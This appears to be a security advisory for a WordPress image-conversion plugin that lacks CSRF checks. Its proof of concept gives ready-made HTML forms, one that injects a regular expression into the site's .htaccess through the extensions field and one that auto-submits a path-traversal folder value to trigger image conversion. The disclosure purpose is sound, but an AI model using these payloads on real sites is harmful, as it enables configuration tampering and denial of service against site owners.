The plugin does not have CSRF checks in place when performing some administrative actions, which could result in modification of plugin settings, Denial-of-Service, as well as arbitrary image conversion
The PoC varies based on the endpoint targeted. Here is one example that will modify the website's .htaccess file when the form is submitted by a logged in user.
<form action="https://example.com/wp-admin/upload.php?page=images-to-webp.php&tab=general" method="post" enctype="application/x-www-form-urlencoded" id="form">
<input type="hidden" name="plugin_sent" value="1">
<input type="hidden" name="webp_quality" value="50">
<input type="hidden" name="upload_convert" value="1">
<input type="hidden" name="method" value="gd">
<input type="hidden" name="extensions[]" value="jpg">
<!-- Inject regular expression. You can also add invalid regex to make malformed .htaccess file and DoS. -->
<input type="hidden" name="extensions[]" value="INJECT_VALUE_HERE)|(.*">
<input type=submit>
</form>
This converts file on C:\xampp\htdocs\png_images if WordPress is installed on C:\xampp\htdocs\wordpress\, the path is relative to wp-content
<form action="https://example.com/wp-admin/admin-ajax.php" method="post" enctype="application/x-www-form-urlencoded" id="form">
<input type="hidden" name="action" value="convert_old_images">
<input type="hidden" name="only_missing" value="0">
<input type="hidden" name="folder" value="../../png_images">
</form>
<script>form.submit()</form>